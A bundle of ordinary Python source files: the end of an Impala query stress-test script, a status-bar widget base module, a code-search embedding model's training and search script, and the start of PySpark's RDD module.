"if encountered. The stress runner still tracks the 'admitted' memory so that "
"it can try to submit more queries than there is available memory for.")
parser.add_argument(
"--max-coordinators", default=0, type=int, metavar="max coordinators",
help="If > 0, submit queries to at most this number of coordinators."
"This is useful in conjunction with --test-admission-control to test behaviour "
"with a smaller number of admission controller instances.")
args = parser.parse_args()
converted_args = StressArgConverter(args)
cli_options.configure_logging(
args.log_level, debug_log_file=args.debug_log_file, log_thread_name=True,
log_process_id=True)
LOG.debug("CLI args: %s" % (args, ))
if (
not args.tpcds_db and not args.tpch_db and not args.random_db and not
args.tpch_nested_db and not args.tpch_kudu_db and not
args.tpcds_kudu_db and not args.query_file_path
):
raise Exception(
"At least one of --tpcds-db, --tpch-db, --tpch-kudu-db,"
"--tpcds-kudu-db, --tpch-nested-db, --random-db, --query-file-path is required")
result_hashes_path = os.path.join(args.results_dir, RESULT_HASHES_DIR)
if not os.path.isdir(result_hashes_path):
os.makedirs(result_hashes_path)
results_dir_path = os.path.join(args.results_dir, PROFILES_DIR)
if not os.path.isdir(results_dir_path):
os.makedirs(results_dir_path)
cluster = cli_options.create_cluster(args)
impala = cluster.impala
if impala.find_stopped_impalads():
impala.restart()
cluster.print_version()
impala.find_and_set_path_to_running_impalad_binary()
if args.cancel_current_queries and impala.queries_are_running():
impala.cancel_queries()
sleep(10)
if impala.queries_are_running():
raise Exception("Queries are currently running on the cluster")
impala.min_impalad_mem_mb = min(impala.find_impalad_mem_mb_limit())
queries_with_runtime_info_by_db_sql_and_options = load_runtime_info(
converted_args.runtime_info_path, impala)
# Start loading the test queries.
queries = list()
# If random queries were requested, those will be handled later. Unlike random queries,
# the TPC queries are expected to always complete successfully.
if args.tpcds_db:
tpcds_queries = load_tpc_queries("tpcds")
assert len(tpcds_queries) == EXPECTED_TPCDS_QUERIES_COUNT
for query in tpcds_queries:
query.db_name = args.tpcds_db
queries.extend(tpcds_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpcds_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.tpch_db:
tpch_queries = load_tpc_queries("tpch")
assert len(tpch_queries) == EXPECTED_TPCH_STRESS_QUERIES_COUNT
for query in tpch_queries:
query.db_name = args.tpch_db
queries.extend(tpch_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpch_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.tpch_nested_db:
tpch_nested_queries = load_tpc_queries("tpch_nested")
assert len(tpch_nested_queries) == EXPECTED_TPCH_NESTED_QUERIES_COUNT
for query in tpch_nested_queries:
query.db_name = args.tpch_nested_db
queries.extend(tpch_nested_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpch_nested_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.tpch_kudu_db:
tpch_kudu_queries = load_tpc_queries("tpch")
assert len(tpch_kudu_queries) == EXPECTED_TPCH_STRESS_QUERIES_COUNT
for query in tpch_kudu_queries:
query.db_name = args.tpch_kudu_db
queries.extend(tpch_kudu_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpch_kudu_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.generate_dml_queries:
with impala.cursor(db_name=args.tpch_kudu_db) as cursor:
prepare_database(cursor)
queries.extend(generate_DML_queries(cursor, args.dml_mod_values))
if args.tpcds_kudu_db:
tpcds_kudu_queries = load_tpc_queries("tpcds")
assert len(tpcds_kudu_queries) == EXPECTED_TPCDS_QUERIES_COUNT
for query in tpcds_kudu_queries:
query.db_name = args.tpcds_kudu_db
queries.extend(tpcds_kudu_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpcds_kudu_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.generate_dml_queries:
with impala.cursor(db_name=args.tpcds_kudu_db) as cursor:
prepare_database(cursor)
queries.extend(generate_DML_queries(cursor, args.dml_mod_values))
if args.reset_databases_before_binary_search:
for database in set(query.db_name for query in queries):
with impala.cursor(db_name=database) as cursor:
reset_databases(cursor)
queries = populate_all_queries(
queries, impala, converted_args, queries_with_runtime_info_by_db_sql_and_options)
# A particular random query may either fail (due to a generator or Impala bug) or
# take a really long time to complete. So the queries needs to be validated. Since the
# runtime info also needs to be collected, that will serve as validation.
if args.random_db:
queries.extend(load_random_queries_and_populate_runtime_info(impala, converted_args))
if args.query_file_path:
file_queries = load_queries_from_test_file(
args.query_file_path, db_name=args.query_file_db)
shuffle(file_queries)
queries.extend(populate_runtime_info_for_random_queries(
impala, file_queries, converted_args))
# Apply tweaks to the query's runtime info as requested by CLI options.
for idx in xrange(len(queries) - 1, -1, -1):
query = queries[idx]
if query.required_mem_mb_with_spilling:
query.required_mem_mb_with_spilling += int(
query.required_mem_mb_with_spilling * args.mem_limit_padding_pct / 100.0) + \
args.mem_limit_padding_abs
if query.required_mem_mb_without_spilling:
query.required_mem_mb_without_spilling += int(
query.required_mem_mb_without_spilling * args.mem_limit_padding_pct / 100.0) + \
args.mem_limit_padding_abs
# Remove any queries that would use "too many" resources. This way a larger number
# of queries will run concurrently.
if query.required_mem_mb_without_spilling is not None and \
query.required_mem_mb_without_spilling / float(impala.min_impalad_mem_mb) \
> args.filter_query_mem_ratio:
LOG.debug(
"Filtering non-spilling query that exceeds "
"--filter-query-mem-ratio: " + query.sql)
query.required_mem_mb_without_spilling = None
if query.required_mem_mb_with_spilling is None \
or query.required_mem_mb_with_spilling / float(impala.min_impalad_mem_mb) \
> args.filter_query_mem_ratio:
LOG.debug("Filtering query that exceeds --filter-query-mem-ratio: " + query.sql)
del queries[idx]
if len(queries) == 0:
raise Exception("All queries were filtered")
print("Using %s queries" % len(queries))
# After the binary search phase finishes, it may be a good idea to reset the database
# again to start the stress test from a clean state.
if args.reset_databases_after_binary_search:
for database in set(query.db_name for query in queries):
with impala.cursor(db_name=database) as cursor:
reset_databases(cursor)
LOG.info("Number of queries in the list: {0}".format(len(queries)))
stress_runner = StressRunner()
stress_runner.results_dir = args.results_dir
stress_runner.startup_queries_per_sec = args.startup_queries_per_second
stress_runner.num_successive_errors_needed_to_abort = args.fail_upon_successive_errors
stress_runner.use_kerberos = args.use_kerberos
stress_runner.cancel_probability = args.cancel_probability
stress_runner.spill_probability = args.spill_probability
stress_runner.leak_check_interval_mins = args.mem_leak_check_interval_mins
stress_runner.common_query_options = converted_args.common_query_options
stress_runner.test_admission_control = converted_args.test_admission_control
stress_runner.max_coordinators = converted_args.max_coordinators
stress_runner.run_queries(
queries, impala, args.max_queries, args.mem_overcommit_pct,
should_print_status=not args.no_status,
verify_results=not args.generate_dml_queries,
select_probability=args.select_probability)
if __name__ == "__main__":
main()
|
base.py
|
#!/usr/bin/env python3
import fcntl
import logging
import os
import shlex
import subprocess
import threading
from barython.hooks import HooksPool
from barython.tools import splitted_sleep
logger = logging.getLogger("barython")
def protect_handler(handler):
def handler_wrapper(self, *args, **kwargs):
try:
if not self._refresh_lock.acquire(blocking=False):
return
result = handler(self, *args, **kwargs)
finally:
if self._lock_start:
try:
self._refresh_lock.release()
except RuntimeError:
pass
return result
return handler_wrapper
class Widget():
"""
Basic Widget
"""
#: cache the content after update
_content = None
_icon = None
_refresh = -1
@property
def content(self):
return self._content
@property
def icon(self):
return self._icon
@icon.setter
def icon(self, value):
self._icon = value
@property
def refresh(self):
if self._refresh == -1 and self.screens:
return min([screen.refresh for screen in self.screens])
else:
return max(0, self._refresh)
@refresh.setter
def refresh(self, value):
self._refresh = value
def decorate(self, text, fg=None, bg=None, padding=0, font=None, icon=None,
actions=None):
"""
Decorate a text with custom properties
:param fg: foreground
:param bg: background
:param padding: padding around the text
:param font: index of font to use
:param actions: dict of actions
"""
try:
joined_actions = "".join(
"%{{A{}:{}:}}".format(a, cmd) for a, cmd in actions.items()
)
except (TypeError, AttributeError):
joined_actions = ""
# if colors are reset in text, padding will not have the good colors
if padding and text:
padding_str = self.decorate(padding * " ", fg=fg, bg=bg, font=font)
else:
padding_str = ""
return (12*"{}").format(
joined_actions,
padding_str,
"%{{B{}}}".format(bg) if bg else "",
"%{{F{}}}".format(fg) if fg else "",
"%{{T{}}}".format(font) if font else "",
icon + " " if icon else "",
text,
"%{{T-}}".format(font) if font else "",
"%{F-}" if fg else "",
"%{B-}" if bg else "",
padding_str,
"%{A}" * len(actions) if actions else "",
)
def decorate_with_self_attributes(self, text, *args, **kwargs):
"""
Return self.decorate but uses self attributes for default values
"""
d_kwargs = {
"fg": self.fg, "bg": self.bg, "padding": self.padding,
"font": self.fonts[0] if self.fonts else None,
"actions": self.actions, **kwargs
}
for parameter, value in zip(("fg", "bg", "padding", "font", "actions"),
args):
d_kwargs[parameter] = value
return self.decorate(text, **d_kwargs)
def trigger_global_update(self, output=None, *args, **kwargs):
new_content = self.decorate_with_self_attributes(output)
self._update_screens(new_content)
@protect_handler
def handler(self, *args, **kwargs):
"""
To use with hooks
"""
with self._lock_update:
self.update()
splitted_sleep(self.refresh, stop=self._stop.is_set)
def organize_result(self, *args, **kwargs):
"""
Organize the info to show with the splitted infos received
Organize the panel without handling the decoration (fg, bg, etc…)
Override this method to change the way the info is printed
"""
result = "{} ".format(self.icon) if self.icon else ""
return result + "".join(*args, *kwargs.values())
def _update_screens(self, new_content):
"""
If content has changed, request the screen update
"""
if self._content != new_content:
self._content = new_content
for screen in self.screens:
threading.Thread(target=screen.update).start()
def continuous_update(self):
while not self._stop.is_set():
try:
self.update()
except Exception as e:
logger.error(e)
splitted_sleep(self.refresh, stop=self._stop.is_set)
def update(self):
pass
def propage_hooks_changes(self):
"""
Propage a change in the hooks pool
"""
if getattr(self, "screens", None):
for s in self.screens:
s.hooks.merge(self)
def start(self, *args, **kwargs):
self._stop.clear()
try:
if not self._lock_start.acquire(blocking=False):
return
if self.infinite:
self.continuous_update()
else:
self.update()
finally:
if self._lock_start:
try:
self._lock_start.release()
except RuntimeError:
pass
def stop(self):
self._stop.set()
def __init__(self, bg=None, fg=None, padding=0, fonts=None, icon="",
actions=None, refresh=-1, screens=None, infinite=False):
#: background for the widget
self.bg = bg
#: foreground for the widget
self.fg = fg
#: list of fonts index used
self.fonts = fonts if fonts is not None else tuple()
#: icon to use. Can be a string or a dict for some widgets, where icon
# will depend about the current value.
self._icon = icon
#: dictionnary of actions
self.actions = actions if actions is not None else dict()
#: padding
self.padding = padding
#: refresh rate
self.refresh = refresh
#: screens linked. Used for callbacks
self.screens = screens if screens is not None else set()
#: pool of hooks
self.hooks = HooksPool(parent=self)
#: run in an infinite loop or not
self.infinite = infinite
#: event to stop the widget
self._stop = threading.Event()
self._lock_start = threading.Condition()
self._lock_update = threading.Condition()
self._refresh_lock = threading.Semaphore(2)
class TextWidget(Widget):
text = ""
def update(self):
with self._lock_update:
new_content = self.decorate_with_self_attributes(
self.organize_result(self.text)
)
self._update_screens(new_content)
def start(self):
with self._lock_start:
self.update()
def __init__(self, text=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.text = self.text if text is None else text
self.infinite = False
class SubprocessWidget(Widget):
"""
Run a subprocess in a loop
"""
_subscribe_subproc = None
_subproc = None
def _no_blocking_read(self, output):
"""
Set the output to be non blockant and read it
"""
fd = output.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
try:
result = output.read()
except:
result = b""
fcntl.fcntl(fd, fcntl.F_SETFL, fl)
return result
def _init_subprocess(self, cmd):
"""
Start cmd in a subprocess, and split it if needed
"""
if self._stop.is_set():
return None
if isinstance(cmd, str):
cmd = shlex.split(cmd)
logger.debug("Launching {}".format(" ".join(cmd)))
return subprocess.Popen(
cmd, stdout=subprocess.PIPE, shell=self.shell, env=self.env
)
def _init_subscribe_subproc(self):
process_dead = (
self._subscribe_subproc is None or
self._subscribe_subproc.poll() is not None
)
if process_dead:
self._subscribe_subproc = self._init_subprocess(
self.subscribe_cmd
)
def notify(self, *args, **kwargs):
if self.subscribe_cmd:
self._init_subscribe_subproc()
self._subscribe_subproc.stdout.readline()
# hack to flush the stdout
try:
self._no_blocking_read(self._subscribe_subproc.stdout)
except:
pass
return True
def continuous_update(self):
while not self._stop.is_set():
try:
self.update()
except Exception as e:
logger.error(e)
try:
self._subproc.terminate()
except:
pass
finally:
splitted_sleep(self.refresh, stop=self._stop.is_set)
self.notify()
try:
self._subproc.terminate()
except:
pass
def update(self, *args, **kwargs):
with self._lock_update:
self._subproc = self._init_subprocess(self.cmd)
output = self._subproc.stdout.readline()
if output != b"":
self.trigger_global_update(self.organize_result(
output.decode().replace('\n', '').replace('\r', '')
))
if self._subproc.poll() is not None:
self._subproc = self._subproc.terminate()
def stop(self, *args, **kwargs):
super().stop(*args, **kwargs)
try:
self._subscribe_subproc.terminate()
self._subscribe_subproc = self._subscribe_subproc.wait()
except:
pass
try:
self._subproc = self._subproc.terminate()
self._subproc = self._subproc.wait()
except:
pass
def __init__(self, cmd, subscribe_cmd=None, shell=False, infinite=True,
*args, **kwargs):
super().__init__(*args, **kwargs, infinite=infinite)
#: override environment variables to get the same output everywhere
self.env = dict(os.environ)
self.env["LANG"] = "en_US"
#: command to run. Can be an iterable or a string
self.cmd = cmd
#: used as a notify: run the command, wait for any output, then run
# cmd.
self.subscribe_cmd = subscribe_cmd
#: value for the subprocess.Popen shell parameter. Default to False
self.shell = shell
|
main.py
|
import os
import sys
import random
import traceback
from tensorflow.keras.optimizers import RMSprop, Adam
from scipy.stats import rankdata
import math
import numpy as np
from tqdm import tqdm
import argparse
random.seed(42)
import threading
import configs
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format="%(asctime)s: %(name)s: %(levelname)s: %(message)s")
from utils import normalize, pad, convert, revert
import models, configs, data_loader
class SearchEngine:
def __init__(self, args, conf=None):
self.data_path = args.data_path + args.dataset+'/'
self.train_params = conf.get('training_params', dict())
self.data_params = conf.get('data_params',dict())
self.model_params = conf.get('model_params',dict())
self._eval_sets = None
self._code_reprs = None
self._codebase = None
self._codebase_chunksize = 2000000
##### Model Loading / saving #####
def save_model(self, model, epoch):
model_path = f"./output/{model.__class__.__name__}/models/"
os.makedirs(model_path, exist_ok=True)
model.save(model_path + f"epo{epoch}_code.h5", model_path + f"epo{epoch}_desc.h5", overwrite=True)
def load_model(self, model, epoch):
model_path = f"./output/{model.__class__.__name__}/models/"
assert os.path.exists(model_path + f"epo{epoch}_code.h5"),f"Weights at epoch {epoch} not found"
assert os.path.exists(model_path + f"epo{epoch}_desc.h5"),f"Weights at epoch {epoch} not found"
model.load(model_path + f"epo{epoch}_code.h5", model_path + f"epo{epoch}_desc.h5")
##### Training #####
def train(self, model):
if self.train_params['reload']>0:
self.load_model(model, self.train_params['reload'])
valid_every = self.train_params.get('valid_every', None)
save_every = self.train_params.get('save_every', None)
batch_size = self.train_params.get('batch_size', 128)
nb_epoch = self.train_params.get('nb_epoch', 10)
split = self.train_params.get('validation_split', 0)
val_loss = {'loss': 1., 'epoch': 0}
chunk_size = self.train_params.get('chunk_size', 100000)
for i in range(self.train_params['reload']+1, nb_epoch):
print('Epoch %d :: \n' % i, end='')
logger.debug('loading data chunk..')
offset = (i-1)*self.train_params.get('chunk_size', 100000)
names = data_loader.load_hdf5(self.data_path+self.data_params['train_methname'], offset, chunk_size)
apis = data_loader.load_hdf5(self.data_path+self.data_params['train_apiseq'], offset, chunk_size)
tokens = data_loader.load_hdf5(self.data_path+self.data_params['train_tokens'], offset, chunk_size)
descs = data_loader.load_hdf5(self.data_path+self.data_params['train_desc'], offset, chunk_size)
logger.debug('padding data..')
methnames = pad(names, self.data_params['methname_len'])
apiseqs = pad(apis, self.data_params['apiseq_len'])
tokens = pad(tokens, self.data_params['tokens_len'])
good_descs = pad(descs,self.data_params['desc_len'])
bad_descs=[desc for desc in descs]
random.shuffle(bad_descs)
bad_descs = pad(bad_descs, self.data_params['desc_len'])
hist = model.fit([methnames, apiseqs, tokens, good_descs, bad_descs], epochs=1, batch_size=batch_size, validation_split=split)
if hist.history['val_loss'][0] < val_loss['loss']:
val_loss = {'loss': hist.history['val_loss'][0], 'epoch': i}
print('Best: Loss = {}, Epoch = {}'.format(val_loss['loss'], val_loss['epoch']))
if save_every is not None and i % save_every == 0:
self.save_model(model, i)
if valid_every is not None and i % valid_every == 0:
acc, mrr, map, ndcg = self.valid(model, 1000, 1)
##### Evaluation in the develop set #####
def valid(self, model, poolsize, K):
"""
validate in a code pool.
param: poolsize - size of the code pool, if -1, load the whole test set
"""
def ACC(real,predict):
sum=0.0
for val in real:
try: index=predict.index(val)
except ValueError: index=-1
if index!=-1: sum=sum+1
return sum/float(len(real))
def MAP(real,predict):
sum=0.0
for id,val in enumerate(real):
try: index=predict.index(val)
except ValueError: index=-1
if index!=-1: sum=sum+(id+1)/float(index+1)
return sum/float(len(real))
def MRR(real,predict):
sum=0.0
for val in real:
try: index=predict.index(val)
except ValueError: index=-1
if index!=-1: sum=sum+1.0/float(index+1)
return sum/float(len(real))
def NDCG(real,predict):
dcg=0.0
idcg=IDCG(len(real))
for i,predictItem in enumerate(predict):
if predictItem in real:
itemRelevance=1
rank = i+1
dcg+=(math.pow(2,itemRelevance)-1.0)*(math.log(2)/math.log(rank+1))
return dcg/float(idcg)
def IDCG(n):
idcg=0
itemRelevance=1
for i in range(n):
idcg+=(math.pow(2, itemRelevance)-1.0)*(math.log(2)/math.log(i+2))
return idcg
#load valid dataset
if self._eval_sets is None:
methnames = data_loader.load_hdf5(self.data_path+self.data_params['valid_methname'], 0, poolsize)
apiseqs= data_loader.load_hdf5(self.data_path+self.data_params['valid_apiseq'], 0, poolsize)
tokens = data_loader.load_hdf5(self.data_path+self.data_params['valid_tokens'], 0, poolsize)
descs = data_loader.load_hdf5(self.data_path+self.data_params['valid_desc'], 0, poolsize)
self._eval_sets={'methnames':methnames, 'apiseqs':apiseqs, 'tokens':tokens, 'descs':descs}
accs,mrrs,maps,ndcgs = [], [], [], []
data_len = len(self._eval_sets['descs'])
for i in tqdm(range(data_len)):
desc=self._eval_sets['descs'][i]#good desc
descs = pad([desc]*data_len,self.data_params['desc_len'])
methnames = pad(self._eval_sets['methnames'],self.data_params['methname_len'])
apiseqs= pad(self._eval_sets['apiseqs'],self.data_params['apiseq_len'])
tokens= pad(self._eval_sets['tokens'],self.data_params['tokens_len'])
n_results = K
sims = model.predict([methnames, apiseqs,tokens, descs], batch_size=data_len).flatten()
negsims= np.negative(sims)
predict = np.argpartition(negsims, kth=n_results-1)
predict = predict[:n_results]
predict = [int(k) for k in predict]
real=[i]
accs.append(ACC(real,predict))
mrrs.append(MRR(real,predict))
maps.append(MAP(real,predict))
ndcgs.append(NDCG(real,predict))
logger.info(f'ACC={np.mean(accs)}, MRR={np.mean(mrrs)}, MAP={np.mean(maps)}, nDCG={np.mean(ndcgs)}')
return acc,mrr,map,ndcg
##### Compute Representation #####
def repr_code(self, model):
logger.info('Loading the use data ..')
methnames = data_loader.load_hdf5(self.data_path+self.data_params['use_methname'],0,-1)
apiseqs = data_loader.load_hdf5(self.data_path+self.data_params['use_apiseq'],0,-1)
tokens = data_loader.load_hdf5(self.data_path+self.data_params['use_tokens'],0,-1)
methnames = pad(methnames, self.data_params['methname_len'])
apiseqs = pad(apiseqs, self.data_params['apiseq_len'])
tokens = pad(tokens, self.data_params['tokens_len'])
logger.info('Representing code ..')
vecs= model.repr_code([methnames, apiseqs, tokens], batch_size=10000)
vecs= vecs.astype(np.float)
vecs= normalize(vecs)
return vecs
def search(self, model, vocab, query, n_results=10):
desc=[convert(vocab, query)]#convert desc sentence to word indices
padded_desc = pad(desc, self.data_params['desc_len'])
desc_repr=model.repr_desc([padded_desc])
desc_repr=desc_repr.astype(np.float32)
desc_repr = normalize(desc_repr).T # [dim x 1]
codes, sims = [], []
threads=[]
for i,code_reprs_chunk in enumerate(self._code_reprs):
t = threading.Thread(target=self.search_thread, args = (codes,sims,desc_repr,code_reprs_chunk,i,n_results))
threads.append(t)
for t in threads:
t.start()
for t in threads:#wait until all sub-threads finish
t.join()
return codes,sims
def search_thread(self, codes, sims, desc_repr, code_reprs, i, n_results):
#1. compute similarity
chunk_sims=np.dot(code_reprs, desc_repr) # [pool_size x 1]
chunk_sims = np.squeeze(chunk_sims, axis=1)
#2. choose top results
negsims=np.negative(chunk_sims)
maxinds = np.argpartition(negsims, kth=n_results-1)
maxinds = maxinds[:n_results]
chunk_codes = [self._codebase[i][k] for k in maxinds]
chunk_sims = chunk_sims[maxinds]
codes.extend(chunk_codes)
sims.extend(chunk_sims)
def postproc(self,codes_sims):
codes_, sims_ = zip(*codes_sims)
codes= [code for code in codes_]
sims= [sim for sim in sims_]
final_codes=[]
final_sims=[]
n=len(codes_sims)
for i in range(n):
is_dup=False
for j in range(i):
if codes[i][:80]==codes[j][:80] and abs(sims[i]-sims[j])<0.01:
is_dup=True
if not is_dup:
final_codes.append(codes[i])
final_sims.append(sims[i])
return zip(final_codes,final_sims)
def parse_args():
parser = argparse.ArgumentParser("Train and Test Code Search(Embedding) Model")
parser.add_argument("--data_path", type=str, default='./data/', help="working directory")
parser.add_argument("--model", type=str, default="JointEmbeddingModel", help="model name")
parser.add_argument("--dataset", type=str, default="github", help="dataset name")
parser.add_argument("--mode", choices=["train","eval","repr_code","search"], default='train',
help="The mode to run. The `train` mode trains a model;"
" the `eval` mode evaluat models in a test set "
" The `repr_code/repr_desc` mode computes vectors"
" for a code snippet or a natural language description with a trained model.")
parser.add_argument("--verbose",action="store_true", default=True, help="Be verbose")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
config=getattr(configs, 'config_'+args.model)()
engine = SearchEngine(args, config)
##### Define model ######
logger.info('Build Model')
model = getattr(models, args.model)(config)#initialize the model
model.build()
model.summary(export_path = f"./output/{args.model}/")
optimizer = config.get('training_params', dict()).get('optimizer', 'adam')
model.compile(optimizer=optimizer)
data_path = args.data_path+args.dataset+'/'
if args.mode=='train':
engine.train(model)
elif args.mode=='eval': # evaluate for a specific epoch
if config['training_params']['reload']>0:
engine.load_model(model, config['training_params']['reload'])
engine.eval(model, -1, 10)
elif args.mode=='repr_code':
if config['training_params']['reload']>0:
engine.load_model(model, config['training_params']['reload'])
vecs = engine.repr_code(model)
data_loader.save_code_reprs(vecs, data_path+config['data_params']['use_codevecs'])
elif args.mode=='search':
#search code based on a desc
if config['training_params']['reload']>0:
engine.load_model(model, config['training_params']['reload'])
engine._code_reprs = data_loader.load_code_reprs(data_path+config['data_params']['use_codevecs'], engine._codebase_chunksize)
engine._codebase = data_loader.load_codebase(data_path+config['data_params']['use_codebase'], engine._codebase_chunksize)
vocab = data_loader.load_pickle(data_path+config['data_params']['vocab_desc'])
while True:
try:
query = input('Input Query: ')
n_results = int(input('How many results? '))
except Exception:
print("Exception while parsing your input:")
traceback.print_exc()
break
query = query.lower().replace('how to ', '').replace('how do i ', '').replace('how can i ', '').replace('?', '').strip()
codes,sims=engine.search(model, vocab, query, n_results)
zipped=zip(codes,sims)
zipped=sorted(zipped, reverse=True, key=lambda x:x[1])
zipped=engine.postproc(zipped)
zipped = list(zipped)[:n_results]
results = '\n\n'.join(map(str,zipped)) #combine the result into a returning string
print(results)
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
from collections import defaultdict
from itertools import chain, ifilter, imap
import operator
import sys
import shlex
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
import bisect
import random
import socket
from math import sqrt, log, isinf, isnan, pow, ceil
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, \
get_used_memory, ExternalSorter
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
# TODO: for Python 3.3+, PYTHONHASHSEED should be reset to disable randomized
# hash for string
def portable_hash(x):
"""
This function returns consistant hash code for builtin types, especially
for None and tuple with None.
The algrithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxint
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = socket.socket()
sock.settimeout(3)
try:
sock.connect(("localhost", port))
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return imap(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
